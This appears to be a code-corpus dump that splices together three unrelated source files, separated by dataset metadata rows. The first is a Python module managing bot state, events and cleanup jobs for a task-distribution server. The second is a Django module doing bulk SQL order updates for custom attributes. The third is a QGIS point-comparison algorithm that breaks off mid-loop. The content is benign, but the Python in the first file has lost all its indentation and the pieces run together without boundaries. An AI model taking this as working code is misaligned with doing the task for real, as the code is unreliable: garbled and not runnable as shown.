# State is purely informative. It is completely free form.
state = datastore_utils.DeterministicJsonProperty(json_type=dict)
# IP address as seen by the HTTP handler.
external_ip = ndb.StringProperty(indexed=False)
# Bot identity as seen by the HTTP handler.
authenticated_as = ndb.StringProperty(indexed=False)
# Version of swarming_bot.zip the bot is currently running.
version = ndb.StringProperty(default='', indexed=False)
# Set when either:
# - dimensions['quarantined'] or state['quarantined'] is set. This either
# happens via internal python error (e.g. an exception while generating
# dimensions) or via self-health check.
# - dimensions['id'] is not exactly one item.
# - invalid HTTP POST request keys.
# - BotSettings.quarantined was set at that moment.
# https://crbug.com/839415
quarantined = ndb.BooleanProperty(default=False, indexed=False)
# If set, the bot is rejecting tasks due to maintenance.
maintenance_msg = ndb.StringProperty(indexed=False)
# Affected by event_type == 'request_task', 'task_killed', 'task_completed',
# 'task_error'.
task_id = ndb.StringProperty(indexed=False)
# Deprecated. TODO(crbug/897355): Remove.
lease_id = ndb.StringProperty(indexed=False)
lease_expiration_ts = ndb.DateTimeProperty(indexed=False)
leased_indefinitely = ndb.BooleanProperty(indexed=False)
machine_type = ndb.StringProperty(indexed=False)
machine_lease = ndb.StringProperty(indexed=False)
# Dimensions are used for task selection. They are encoded as a list of
# key:value. Keep in mind that the same key can be used multiple times. The
# list must be sorted. It is indexed to enable searching for bots.
dimensions_flat = ndb.StringProperty(repeated=True)
# Last time the bot pinged and this entity was updated
last_seen_ts = ndb.DateTimeProperty()
@property
def dimensions(self):
"""Returns a dict representation of self.dimensions_flat."""
out = {}
for i in self.dimensions_flat:
k, v = i.split(':', 1)
out.setdefault(k, []).append(v)
return out
@property
def id(self):
return self.key.parent().string_id()
@property
def task(self):
if not self.task_id:
return None
return task_pack.unpack_run_result_key(self.task_id)
def to_dict(self, exclude=None):
exclude = ['dimensions_flat'] + (exclude or [])
out = super(_BotCommon, self).to_dict(exclude=exclude)
out['dimensions'] = self.dimensions
return out
def to_proto(self, out):
"""Converts self to a swarming_pb2.Bot."""
# Used by BotEvent.to_proto() and BotInfo.to_proto().
if self.key:
out.bot_id = self.key.parent().string_id()
#out.session_id = '' # https://crbug.com/786735
for l in self.dimensions_flat:
if l.startswith(u'pool:'):
out.pools.append(l[len(u'pool:'):])
if self.is_dead:
out.status = swarming_pb2.MISSING
out.status_msg = ''
# https://crbug.com/757931: QUARANTINED_BY_SERVER
# https://crbug.com/870723: OVERHEAD_BOT_INTERNAL
# https://crbug.com/870723: HOST_REBOOTING
# https://crbug.com/913978: RESERVED
if self.quarantined:
out.status = swarming_pb2.QUARANTINED_BY_BOT
msg = (self.state or {}).get(u'quarantined')
if msg:
if not isinstance(msg, basestring):
# Having {'quarantined': True} is valid for the state, convert this to
# a string.
msg = 'true'
out.status_msg = msg
elif self.maintenance_msg:
out.status = swarming_pb2.OVERHEAD_MAINTENANCE_EXTERNAL
out.status_msg = self.maintenance_msg
elif self.task_id:
out.status = swarming_pb2.BUSY
if self.task_id:
out.current_task_id = self.task_id
for key, values in sorted(self.dimensions.items()):
d = out.dimensions.add()
d.key = key
for value in values:
d.values.append(value)
# The BotInfo part.
if self.state:
out.info.supplemental.update(self.state)
if self.version:
out.info.version = self.version
if self.authenticated_as:
out.info.authenticated_as = self.authenticated_as
if self.external_ip:
out.info.external_ip = self.external_ip
if self.is_dead and self.last_seen_ts:
out.info.last_seen_ts.FromDatetime(self.last_seen_ts)
# TODO(maruel): Populate bot.info.host and bot.info.devices.
# https://crbug.com/916570
def _pre_put_hook(self):
super(_BotCommon, self)._pre_put_hook()
self.dimensions_flat.sort()
class BotInfo(_BotCommon):
"""This entity declare the knowledge about a bot that successfully connected.
Parent is BotRoot. Key id is 'info'.
This entity is a cache of the last BotEvent and is additionally updated on
poll, which does not create a BotEvent.
"""
# One of:
NOT_IN_MAINTENANCE = 1 << 9 # 512
IN_MAINTENANCE = 1 << 8 # 256
# One of:
ALIVE = 1 << 7 # 128
DEAD = 1 << 6 # 64
# One of:
HEALTHY = 1 << 3 # 8
QUARANTINED = 1 << 2 # 4
# One of:
IDLE = 1<<1 # 2
BUSY = 1<<0 # 1
# First time this bot was seen.
first_seen_ts = ndb.DateTimeProperty(auto_now_add=True, indexed=False)
# Must only be set when self.task_id is set.
task_name = ndb.StringProperty(indexed=False)
# Avoid having huge amounts of indices to query by quarantined/idle.
composite = ndb.IntegerProperty(repeated=True)
def _calc_composite(self):
"""Returns the value for BotInfo.composite, which permits quick searches."""
return [
self.IN_MAINTENANCE
if self.maintenance_msg else self.NOT_IN_MAINTENANCE,
self.DEAD if self.should_be_dead else self.ALIVE,
self.QUARANTINED if self.quarantined else self.HEALTHY,
self.BUSY if self.task_id else self.IDLE
]
@property
def should_be_dead(self):
# check if the last seen is over deadline
return self.last_seen_ts <= self._deadline()
@property
def is_dead(self):
assert self.composite, 'Please store first'
return self.DEAD in self.composite
@property
def is_alive(self):
assert self.composite, 'Please store first'
return self.ALIVE in self.composite
def to_dict(self, exclude=None):
out = super(BotInfo, self).to_dict(exclude=exclude)
# Inject the bot id, since it's the entity key.
out['id'] = self.id
out['is_dead'] = self.is_dead
return out
def to_proto(self, out):
"""Converts self to a swarming_pb2.Bot."""
# This populates most of the data.
super(BotInfo, self).to_proto(out)
# https://crbug.com/757931: QUARANTINED_BY_SERVER
# https://crbug.com/870723: OVERHEAD_BOT_INTERNAL
# https://crbug.com/870723: HOST_REBOOTING
# https://crbug.com/913978: RESERVED
# TODO(maruel): Populate bot.info.host and bot.info.devices.
# https://crbug.com/916570
def _pre_put_hook(self):
super(BotInfo, self)._pre_put_hook()
if not self.task_id:
self.task_name = None
self.composite = self._calc_composite()
@classmethod
def yield_alive_bots(cls):
"""Yields alive bots."""
return cls.query(cls.composite == cls.ALIVE)
@classmethod
def yield_bots_should_be_dead(cls):
"""Yields bots who should be dead."""
q = cls.yield_alive_bots()
cursor = None
more = True
while more:
bots, cursor, more = q.fetch_page(1000, start_cursor=cursor)
for b in bots:
if not b.should_be_dead:
continue
yield b
@staticmethod
def _deadline():
dt = datetime.timedelta(seconds=config.settings().bot_death_timeout_secs)
return utils.utcnow() - dt
class BotEvent(_BotCommon):
"""This entity is immutable.
Parent is BotRoot. Key id is monotonically decreasing with
datastore_utils.store_new_version().
This entity is created on each bot state transition.
"""
_MAPPING = {
'bot_connected': swarming_pb2.BOT_NEW_SESSION,
'bot_internal_failure': swarming_pb2.BOT_INTERNAL_FAILURE,
'bot_hook_error': swarming_pb2.BOT_HOOK_ERROR,
'bot_hook_log': swarming_pb2.BOT_HOOK_LOG,
# Historically ambiguous. It used to be both bot_internal_failure and
# bot_hook_error.
'bot_error': swarming_pb2.BOT_HOOK_ERROR,
# Historical misnaming. This is equivalent to bot_hook_log.
'bot_log': swarming_pb2.BOT_HOOK_LOG,
# TODO(maruel): Add definition if desired.
'bot_leased': None,
# Historical misnaming.
'bot_rebooting': swarming_pb2.BOT_REBOOTING_HOST,
'bot_shutdown': swarming_pb2.BOT_SHUTDOWN,
# Historical misnaming.
'bot_terminate': swarming_pb2.INSTRUCT_TERMINATE_BOT,
'bot_missing': swarming_pb2.BOT_MISSING,
'request_restart': swarming_pb2.INSTRUCT_RESTART_BOT,
# Shall only be sorted when there is a significant difference in the bot
# state versus the previous event.
'request_sleep': swarming_pb2.INSTRUCT_IDLE,
'request_task': swarming_pb2.INSTRUCT_START_TASK,
'request_update': swarming_pb2.INSTRUCT_UPDATE_BOT_CODE,
'task_completed': swarming_pb2.TASK_COMPLETED,
'task_error': swarming_pb2.TASK_INTERNAL_FAILURE,
'task_killed': swarming_pb2.TASK_KILLED,
# This value is not registered in the API.
'task_update': None
}
ALLOWED_EVENTS = {
# Bot specific events that are outside the scope of a task:
'bot_connected',
# Deprecated. Use bot_hook_error or bot_internal_failure.
# TODO(maruel): Remove 2020-01-01.
'bot_error',
'bot_internal_failure',
'bot_hook_error',
'bot_hook_log',
'bot_leased',
# Deprecated. Use bot_hook_log.
# TODO(maruel): Remove 2020-01-01.
'bot_log',
'bot_missing',
'bot_rebooting',
'bot_shutdown',
'bot_terminate',
# Bot polling result:
'request_restart',
'request_sleep',
'request_task',
'request_update',
# Task lifetime as processed by the bot:
'task_completed',
'task_error',
'task_killed',
'task_update',
}
# Common properties for all events (which includes everything in _BotCommon).
ts = ndb.DateTimeProperty(auto_now_add=True)
event_type = ndb.StringProperty(choices=ALLOWED_EVENTS)
# event_type == 'bot_error', 'request_restart', 'bot_rebooting', etc.
message = ndb.TextProperty()
@property
def is_dead(self):
return self.event_type == 'bot_missing'
@property
def previous_key(self):
"""Returns the ndb.Key to the previous event."""
return ndb.Key(
self.__class__, self.key.integer_id()+1, parent=self.key.parent())
def to_proto(self, out):
"""Converts self to a swarming_pb2.BotEvent."""
if self.ts:
out.event_time.FromDatetime(self.ts)
# Populates out.bot with _BotCommon.
_BotCommon.to_proto(self, out.bot)
# https://crbug.com/905087: BOT_DELETED
e = self._MAPPING.get(self.event_type)
if e:
out.event = e
if self.message:
out.event_msg = self.message
class BotSettings(ndb.Model):
"""Contains all settings that are set by the administrator on the server.
Parent is BotRoot. Key id is 'settings'.
This entity must always be updated in a transaction.
"""
# If set to True, no task is handed out to this bot due to the bot being in a
# broken situation.
quarantined = ndb.BooleanProperty()
class DimensionValues(ndb.Model):
"""Inlined into DimensionAggregation, never stored standalone."""
dimension = ndb.StringProperty()
values = ndb.StringProperty(repeated=True)
class DimensionAggregation(ndb.Model):
"""Has all dimensions that are currently exposed by the bots.
There's a single root entity stored with id 'current', see KEY below.
This entity is updated via cron job /internal/cron/aggregate_bots_dimensions
updated every hour.
"""
dimensions = ndb.LocalStructuredProperty(
DimensionValues, repeated=True, compressed=True)
ts = ndb.DateTimeProperty()
# Key for all dimensions. the legacy key 'current' will be removed.
KEY = ndb.Key('DimensionAggregation', 'current')
### Public APIs.
def get_root_key(bot_id):
"""Returns the BotRoot ndb.Key for a known bot."""
if not bot_id:
raise ValueError('Bad id')
return ndb.Key(BotRoot, bot_id)
def get_info_key(bot_id):
"""Returns the BotInfo ndb.Key for a known bot."""
return ndb.Key(BotInfo, 'info', parent=get_root_key(bot_id))
def get_events_query(bot_id, order):
"""Returns an ndb.Query for most recent events in reverse chronological order.
"""
# Disable the in-process local cache. This is important, as there can be up to
# a thousand entities loaded in memory, and this is a pure memory leak, as
# there's no chance this specific instance will need these again, therefore
# this leads to 'Exceeded soft memory limit' AppEngine errors.
q = BotEvent.query(
default_options=ndb.QueryOptions(use_cache=False),
ancestor=get_root_key(bot_id))
if order:
q = q.order(BotEvent.key)
return q
def get_settings_key(bot_id):
"""Returns the BotSettings ndb.Key for a known bot."""
return ndb.Key(BotSettings, 'settings', parent=get_root_key(bot_id))
def get_aggregation_key(group):
"""Returns the DimensionAggregation ndb.Key for a group."""
return ndb.Key(DimensionAggregation, group)
def filter_dimensions(q, dimensions):
"""Filters a ndb.Query for BotInfo based on dimensions in the request."""
for d in dimensions:
parts = d.split(':', 1)
if len(parts) != 2 or any(i.strip() != i or not i for i in parts):
raise ValueError('Invalid dimensions')
# expand OR operator
# e.g. 'foo:A|B' -> ['foo:A', 'foo:B']
values = parts[1].split(OR_DIM_SEP)
dims = ['%s:%s' % (parts[0], v) for v in values]
q = q.filter(BotInfo.dimensions_flat.IN(dims))
return q
def filter_availability(q, quarantined, in_maintenance, is_dead, is_busy):
"""Filters a ndb.Query for BotInfo based on quarantined/is_dead/is_busy."""
if quarantined is not None:
if quarantined:
q = q.filter(BotInfo.composite == BotInfo.QUARANTINED)
else:
q = q.filter(BotInfo.composite == BotInfo.HEALTHY)
if in_maintenance is not None:
if in_maintenance:
q = q.filter(BotInfo.composite == BotInfo.IN_MAINTENANCE)
else:
q = q.filter(BotInfo.composite == BotInfo.NOT_IN_MAINTENANCE)
if is_busy is not None:
if is_busy:
q = q.filter(BotInfo.composite == BotInfo.BUSY)
else:
q = q.filter(BotInfo.composite == BotInfo.IDLE)
if is_dead:
q = q.filter(BotInfo.composite == BotInfo.DEAD)
elif is_dead is not None:
q = q.filter(BotInfo.composite == BotInfo.ALIVE)
# TODO(charliea): Add filtering based on the 'maintenance' field.
return q
def bot_event(
event_type, bot_id, external_ip, authenticated_as, dimensions, state,
version, quarantined, maintenance_msg, task_id, task_name,
register_dimensions, **kwargs):
"""Records when a bot has queried for work.
This event happening usually means the bot is alive (not dead), except for
'bot_missing' event which is created by server. It may be quarantined, and
in this case, it will be evicted from the task queues.
If it's declaring maintenance, it will not be evicted from the task queues, as
maintenance is supposed to be temporary and expected to complete within a
reasonable time frame.
Arguments:
- event_type: event type, one of BotEvent.ALLOWED_EVENTS.
- bot_id: bot id.
- external_ip: IP address as seen by the HTTP handler.
- authenticated_as: bot identity as seen by the HTTP handler.
- dimensions: Bot's dimensions as self-reported. If not provided, keep
previous value.
- state: ephemeral state of the bot. It is expected to change constantly. If
not provided, keep previous value.
- version: swarming_bot.zip version as self-reported. Used to spot if a bot
failed to update promptly. If not provided, keep previous value.
- quarantined: bool to determine if the bot was declared quarantined.
- maintenance_msg: string describing why the bot is in maintenance.
- task_id: packed task id if relevant. Set to '' to zap the stored value.
- task_name: task name if relevant. Zapped when task_id is zapped.
- register_dimensions: bool to specify whether to register dimensions to
BotInfo.
- kwargs: optional values to add to BotEvent relevant to event_type.
Returns:
ndb.Key to BotEvent entity if one was added.
"""
if not bot_id:
return
# Retrieve the previous BotInfo and update it.
info_key = get_info_key(bot_id)
bot_info = info_key.get()
if not bot_info:
bot_info = BotInfo(key=info_key)
if dimensions:
dimensions_flat = task_queues.bot_dimensions_to_flat(dimensions)
# Register only id and pool dimensions at the first handshake.
bot_info.dimensions_flat = [
d for d in dimensions_flat
if d.startswith('id:') or d.startswith('pool:')
]
now = utils.utcnow()
# bot_missing event is created by a server, not a bot.
# So it shouldn't update last_seen_ts, external_ip, authenticated_as,
# maintenance_msg.
# If the last_seen_ts gets updated, it would change the bot composite
# to alive. And if it clears maintenance_msg, it would change the composite
# to NOT_IN_MAINTENANCE and lose the message.
if event_type != 'bot_missing':
bot_info.last_seen_ts = now
bot_info.external_ip = external_ip
bot_info.authenticated_as = authenticated_as
bot_info.maintenance_msg = maintenance_msg
dimensions_updated = False
dimensions_flat = []
if dimensions:
dimensions_flat = task_queues.bot_dimensions_to_flat(dimensions)
if register_dimensions and bot_info.dimensions_flat != dimensions_flat:
logging.debug('bot_event: Updating dimensions. from: %s, to: %s',
bot_info.dimensions_flat, dimensions_flat)
bot_info.dimensions_flat = dimensions_flat
dimensions_updated = True
if state:
bot_info.state = state
if quarantined is not None:
bot_info.quarantined = quarantined
if task_id is not None:
bot_info.task_id = task_id
# Remove the task from the BotInfo summary in the following cases
# 1) When the task finishes (event_type=task_XXX)
# In these cases, the BotEvent shall have the task
# since the event still refers to it
# 2) When the bot is pooling (event_type=request_sleep)
# The bot has already finished the previous task.
# But it could have forgotten to remove the task from the BotInfo.
# So ensure the task is removed.
# 3) When the bot is missing
# We assume it can't process assigned task anymore.
if event_type in ('task_completed', 'task_error', 'task_killed',
'request_sleep', 'bot_missing'):
bot_info.task_id = None
bot_info.task_name = None
if task_name:
bot_info.task_name = task_name
if version is not None:
bot_info.version = version
if quarantined:
# Make sure it is not in the queue since it can't reap anything.
task_queues.cleanup_after_bot(info_key.parent())
# Decide whether saving the event.
# It's not much of an even worth saving a BotEvent for but it's worth
# updating BotInfo. The only reason BotInfo is GET is to keep first_seen_ts.
# It's not necessary to use a transaction here since no BotEvent is being
# added, only last_seen_ts is really updated.
# crbug.com/1015365: It's useful saving BotEvent when dimensions updates.
# crbug.com/952984: It needs to save BotEvent when quarantined.
skip_save_event = (not dimensions_updated and not quarantined and
event_type in ('request_sleep', 'task_update'))
if skip_save_event:
bot_info.put()
return
# When it's a 'bot_*' or 'request_*' event, use the dimensions provided
# by the bot.
# When it's a 'task_*' event, use BotInfo.dimensios_flat since dimensions
# aren't provided by the bot.
event_dimensions_flat = dimensions_flat or bot_info.dimensions_flat
event = BotEvent(
parent=get_root_key(bot_id),
event_type=event_type,
external_ip=external_ip,
authenticated_as=authenticated_as,
dimensions_flat=event_dimensions_flat,
quarantined=bot_info.quarantined,
maintenance_msg=bot_info.maintenance_msg,
state=bot_info.state,
task_id=task_id or bot_info.task_id,
version=bot_info.version,
**kwargs)
datastore_utils.store_new_version(event, BotRoot, [bot_info])
return event.key
def has_capacity(dimensions):
"""Returns True if there's a reasonable chance for this task request
dimensions set to be serviced by a bot alive.
First look at the task queues, then look into the datastore to figure this
out.
"""
assert not ndb.in_transaction()
# Look at the fast path.
cap = task_queues.probably_has_capacity(dimensions)
if cap is not None:
return cap
# Add it to the 'quick cache' to improve performance. This cache is kept for
# the same duration as how long bots are considered still alive without a
# ping. Useful if there's a single bot in the fleet for these dimensions and
# it takes a long time to reboot. This is the case with Android with slow
# initialization and some baremetal bots (thanks SCSI firmware!).
seconds = config.settings().bot_death_timeout_secs
@ndb.tasklet
def run_query(flat):
# Do a query. That's slower and it's eventually consistent.
q = BotInfo.query()
for f in flat:
q = q.filter(BotInfo.dimensions_flat == f)
num = yield q.count_async(limit=1)
if num:
logging.info('Found capacity via BotInfo: %s', flat)
raise ndb.Return(True)
# Search a bit harder. In this case, we're looking for BotEvent which would
# be a bot that used to exist recently.
cutoff = utils.utcnow() - datetime.timedelta(seconds=seconds)
q = BotEvent.query(BotEvent.ts > cutoff)
for f in flat:
q = q.filter(BotEvent.dimensions_flat == f)
num = yield q.count_async(limit=1)
if num:
logging.info('Found capacity via BotEvent: %s', flat)
raise ndb.Return(True)
raise ndb.Return(False)
futures = [
run_query(f) for f in task_queues.expand_dimensions_to_flats(dimensions)
]
ndb.tasklets.Future.wait_all(futures)
if any(f.get_result() for f in futures):
task_queues.set_has_capacity(dimensions, seconds)
return True
logging.warning('HAS NO CAPACITY: %s', dimensions)
return False
def get_pools_from_dimensions_flat(dimensions_flat):
"""Gets pools from dimensions_flat."""
return [
d.replace('pool:', '') for d in dimensions_flat if d.startswith('pool:')
]
def cron_update_bot_info():
"""Refreshes BotInfo.composite for dead bots."""
@ndb.tasklet
def run(bot):
if bot and bot.should_be_dead and (bot.is_alive or not bot.is_dead):
# bot composite get updated in _pre_put_hook
yield bot.put_async()
logging.info('Changing Bot status to DEAD: %s', bot.id)
raise ndb.Return(bot.key)
raise ndb.Return(None)
def tx_result(future, stats):
bot_key = future.get_result()
if not bot_key:
# Do nothing.
return
try:
# Unregister the bot from task queues since it can't reap anything.
task_queues.cleanup_after_bot(bot_key.parent())
stats['dead'] += 1
bot = bot_key.get()
if not bot:
logging.warning('BotInfo does not exist. key: %s', bot_key)
stats['failed'] += 1
return
logging.info('Sending bot_missing event: %s', bot.id)
bot_event(
event_type='bot_missing',
bot_id=bot.id,
message=None,
external_ip=None,
authenticated_as=None,
dimensions=None,
state=None,
version=None,
quarantined=None,
maintenance_msg=None,
task_id=None,
task_name=None,
register_dimensions=False,
last_seen_ts=bot.last_seen_ts)
except datastore_utils.CommitError:
logging.warning('Failed to commit a Tx')
stats['failed'] += 1
# The assumption here is that a cron job can churn through all the entities
# fast enough. The number of dead bot is expected to be <10k. In practice the
# average runtime is around 8 seconds.
cron_stats = {
'dead': 0,
'seen': 0,
'failed': 0,
}
futures = []
logging.debug('Updating dead bots...')
try:
for b in BotInfo.yield_bots_should_be_dead():
cron_stats['seen'] += 1
# Retry more often than the default 1. We do not want to throw too much
# in the logs and there should be plenty of time to do the retries.
f = datastore_utils.transaction_async(lambda: run(b), retries=5)
futures.append(f)
if len(futures) < 5:
continue
ndb.Future.wait_any(futures)
for i in range(len(futures) - 1, -1, -1):
if futures[i].done():
f = futures.pop(i)
tx_result(f, cron_stats)
if cron_stats['seen'] % 50 == 0:
logging.debug('Fetched %d bot keys', cron_stats['seen'])
for f in futures:
tx_result(f, cron_stats)
finally:
logging.debug('Seen %d bots, updated %d dead bots, failed %d tx',
cron_stats['seen'], cron_stats['dead'], cron_stats['failed'])
return cron_stats['dead']
def cron_delete_old_bot_events():
"""Deletes very old BotEvent entities."""
start = utils.utcnow()
# Run for 4.5 minutes and schedule the cron job every 5 minutes. Running for
# 9.5 minutes (out of 10 allowed for a cron job) results in 'Exceeded soft
# private memory limit of 512 MB with 512 MB' even if this loop should be
# fairly light on memory usage.
time_to_stop = start + datetime.timedelta(seconds=int(4.5*60))
end_ts = start - _OLD_BOT_EVENTS_CUT_OFF
more = True
cursor = None
count = 0
first_ts = None
try:
# Order is by key, so it is naturally ordered by bot, which means the
# operations will mainly operate on one root entity at a time.
q = BotEvent.query(default_options=ndb.QueryOptions(keys_only=True)).filter(
BotEvent.ts <= end_ts)
while more:
keys, cursor, more = q.fetch_page(10, start_cursor=cursor)
if not keys:
break
if not first_ts:
# Fetch the very first entity to get an idea of the range being
# processed.
while keys:
# It's possible that the query returns ndb.Key for entities that do
# not exist anymore due to an inconsistent index. Handle this
# explicitly.
e = keys[0].get()
if not e:
keys = keys[1:]
continue
first_ts = e.ts
break
ndb.delete_multi(keys)
count += len(keys)
if utils.utcnow() >= time_to_stop:
break
return count
except runtime.DeadlineExceededError:
pass
finally:
def _format_ts(t):
# datetime.datetime
return t.strftime(u'%Y-%m-%d %H:%M') if t else 'N/A'
def _format_delta(e, s):
# datetime.timedelta
return str(e-s).rsplit('.', 1)[0] if e and s else 'N/A'
logging.info(
'Deleted %d BotEvent entities; from %s\n'
'Cut off was %s; trailing by %s', count, _format_ts(first_ts),
_format_ts(end_ts), _format_delta(end_ts, first_ts))
def cron_delete_old_bot():
"""Deletes stale BotRoot entity groups."""
start = utils.utcnow()
# Run for 4.5 minutes and schedule the cron job every 5 minutes. Running for
# 9.5 minutes (out of 10 allowed for a cron job) results in 'Exceeded soft
# private memory limit of 512 MB with 512 MB' even if this loop should be
# fairly light on memory usage.
time_to_stop = start + datetime.timedelta(seconds=int(4.5*60))
total = 0
skipped = 0
deleted = []
try:
q = BotRoot.query(default_options=ndb.QueryOptions(keys_only=True))
cursor = None
more = True
while more:
bot_root_keys, cursor, more = q.fetch_page(1000, start_cursor=cursor)
for bot_root_key in bot_root_keys:
# Check if it has any BotEvent left. If not, it means that the entity is
# older than _OLD_BOT_EVENTS_CUF_OFF, so the whole thing can be deleted
# now.
# In particular, ignore the fact that BotInfo may still exist, since if
# there's no BotEvent left, it's probably a broken entity or a forgotten
# dead bot.
if BotEvent.query(ancestor=bot_root_key).count(limit=1):
skipped += 1
continue
deleted.append(bot_root_key.string_id())
# Delete the whole group. An ancestor query will retrieve the entity
# itself too, so no need to explicitly delete it.
keys = ndb.Query(ancestor=bot_root_key).fetch(keys_only=True)
ndb.delete_multi(keys)
total += len(keys)
logging.info(
'Deleted %d entities from the following bots (%d skipped):\n%s',
total, skipped, ', '.join(sorted(deleted)))
deleted = []
if utils.utcnow() >= time_to_stop:
break
return total
except runtime.DeadlineExceededError:
pass
finally:
logging.info(
'Deleted %d entities from the following bots (%d skipped):\n%s', total,
skipped, ', '.join(sorted(deleted)))
def cron_aggregate_dimensions():
"""Aggregates dimensions for all pools and each pool."""
# {
# 'all': { 'os': set(...), 'cpu': set(...), ...},
# 'pool1': { 'os': set(...), 'cpu': set(...), ...},
# ...
# }
seen = defaultdict(lambda: defaultdict(set))
now = utils.utcnow()
for b in BotInfo.query():
groups = get_pools_from_dimensions_flat(b.dimensions_flat)
groups.append('all')
for i in b.dimensions_flat:
k, v = i.split(':', 1)
if k == 'id':
continue
for g in groups:
seen[g][k].add(v)
for group, dims in seen.items():
dims_prop = [
DimensionValues(dimension=k, values=sorted(values))
for k, values in sorted(dims.items())
]
logging.info('Saw dimensions %s in %s', dims_prop, group)
# TODO(jwata): remove the 'current' key after switching to the 'all' key.
if group == 'all':
DimensionAggregation(
key=DimensionAggregation.KEY, dimensions=dims_prop, ts=now).put()
DimensionAggregation(
key=get_aggregation_key(group), dimensions=dims_prop, ts=now).put()
def task_bq_events(start, end):
"""Sends BotEvents to BigQuery swarming.bot_events table."""
def _convert(e):
"""Returns a tuple(bq_key, row)."""
out = swarming_pb2.BotEvent()
e.to_proto(out)
bq_key = e.id + ':' + e.ts.strftime(u'%Y-%m-%dT%H:%M:%S.%fZ')
return (bq_key, out)
total = 0
q = BotEvent.query(BotEvent.ts >= start, BotEvent.ts <= end)
cursor = None
more = True
while more:
entities, cursor, more = q.fetch_page(500, start_cursor=cursor)
total += len(entities)
bq_state.send_to_bq('bot_events', [_convert(e) for e in entities])
return total
| apache-2.0 | 6,103,475,689,103,912,000 | 33.29708 | 80 | 0.647767 | false | 3.548713 | false | false | false |
bdang2012/taiga-back-casting | taiga/projects/custom_attributes/services.py | 1 | 2749 | # Copyright (C) 2014-2015 Andrey Antukh <[email protected]>
# Copyright (C) 2014-2015 Jesús Espino <[email protected]>
# Copyright (C) 2014-2015 David Barragán <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.db import transaction
from django.db import connection
@transaction.atomic
def bulk_update_userstory_custom_attribute_order(project, user, data):
cursor = connection.cursor()
sql = """
prepare bulk_update_order as update custom_attributes_userstorycustomattribute set "order" = $1
where custom_attributes_userstorycustomattribute.id = $2 and
custom_attributes_userstorycustomattribute.project_id = $3;
"""
cursor.execute(sql)
for id, order in data:
cursor.execute("EXECUTE bulk_update_order (%s, %s, %s);",
(order, id, project.id))
cursor.execute("DEALLOCATE bulk_update_order")
cursor.close()
@transaction.atomic
def bulk_update_task_custom_attribute_order(project, user, data):
cursor = connection.cursor()
sql = """
prepare bulk_update_order as update custom_attributes_taskcustomattribute set "order" = $1
where custom_attributes_taskcustomattribute.id = $2 and
custom_attributes_taskcustomattribute.project_id = $3;
"""
cursor.execute(sql)
for id, order in data:
cursor.execute("EXECUTE bulk_update_order (%s, %s, %s);",
(order, id, project.id))
cursor.execute("DEALLOCATE bulk_update_order")
cursor.close()
@transaction.atomic
def bulk_update_issue_custom_attribute_order(project, user, data):
cursor = connection.cursor()
sql = """
prepare bulk_update_order as update custom_attributes_issuecustomattribute set "order" = $1
where custom_attributes_issuecustomattribute.id = $2 and
custom_attributes_issuecustomattribute.project_id = $3;
"""
cursor.execute(sql)
for id, order in data:
cursor.execute("EXECUTE bulk_update_order (%s, %s, %s);",
(order, id, project.id))
cursor.execute("DEALLOCATE bulk_update_order")
cursor.close()
| agpl-3.0 | -7,095,326,727,825,272,000 | 38.811594 | 99 | 0.692028 | false | 3.702156 | false | false | false |
lcoandrade/DsgTools | core/DSGToolsProcessingAlgs/Algs/OtherAlgs/pecCalculatorAlgorithm.py | 1 | 8434 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
DsgTools
A QGIS plugin
Brazilian Army Cartographic Production Tools
-------------------
begin : 2019-05-31
git sha : $Format:%H$
copyright : (C) 2019 by Philipe Borba - Cartographic Engineer @ Brazilian Army
Emerson Xavier - Cartographic Engineer @ Brazilian Army
email : [email protected]
[email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
import math
import functools
from ...algRunner import AlgRunner
import processing
from PyQt5.QtCore import QCoreApplication
from qgis.core import (QgsProcessing,
QgsFeatureSink,
QgsProcessingAlgorithm,
QgsProcessingParameterFeatureSource,
QgsProcessingParameterFeatureSink,
QgsFeature,
QgsDataSourceUri,
QgsProcessingOutputVectorLayer,
QgsProcessingParameterVectorLayer,
QgsWkbTypes,
QgsProcessingParameterBoolean,
QgsProcessingParameterEnum,
QgsProcessingParameterNumber,
QgsProcessingParameterMultipleLayers,
QgsProcessingUtils,
QgsSpatialIndex,
QgsGeometry,
QgsProcessingParameterField,
QgsProcessingMultiStepFeedback,
QgsProcessingParameterFile,
QgsProcessingParameterExpression,
QgsProcessingException,
QgsFeatureRequest,
QgsRectangle)
class PecCalculatorAlgorithm(QgsProcessingAlgorithm):
INPUT = 'INPUT'
REFERENCE = 'REFERENCE'
TOLERANCE = 'TOLERANCE'
# OUTPUT = 'OUTPUT'
def initAlgorithm(self, config):
"""
Parameter setting.
"""
self.addParameter(
QgsProcessingParameterVectorLayer(
self.INPUT,
self.tr('Input layer'),
[QgsProcessing.TypeVectorPoint]
)
)
self.addParameter(
QgsProcessingParameterVectorLayer(
self.REFERENCE,
self.tr('Reference layer'),
[QgsProcessing.TypeVectorPoint]
)
)
self.addParameter(
QgsProcessingParameterNumber(
self.TOLERANCE,
self.tr('Max distance'),
minValue=0,
type=QgsProcessingParameterNumber.Double,
defaultValue=2
)
)
def processAlgorithm(self, parameters, context, feedback):
"""
Here is where the processing itself takes place.
"""
inputLyr = self.parameterAsVectorLayer(
parameters,
self.INPUT,
context
)
referenceLyr = self.parameterAsVectorLayer(
parameters,
self.REFERENCE,
context
)
tol = self.parameterAsDouble(
parameters,
self.TOLERANCE,
context
)
distanceDict = dict()
featList = [i for i in inputLyr.getFeatures()]
step = 100/len(featList) if featList else 0
for current, feat in enumerate(featList):
if feedback.isCanceled():
break
if not feat.geometry().isGeosValid():
continue
id = feat.id()
geom = feat.geometry().asGeometryCollection()[0].asPoint()
x = geom.x()
y = geom.y()
bbox = QgsRectangle(
x-tol,
y-tol,
x+tol,
y+tol
)
request = QgsFeatureRequest()
request.setFilterRect(bbox)
minDistance = 0
candidateId = None
for candidateFeat in referenceLyr.getFeatures(request):
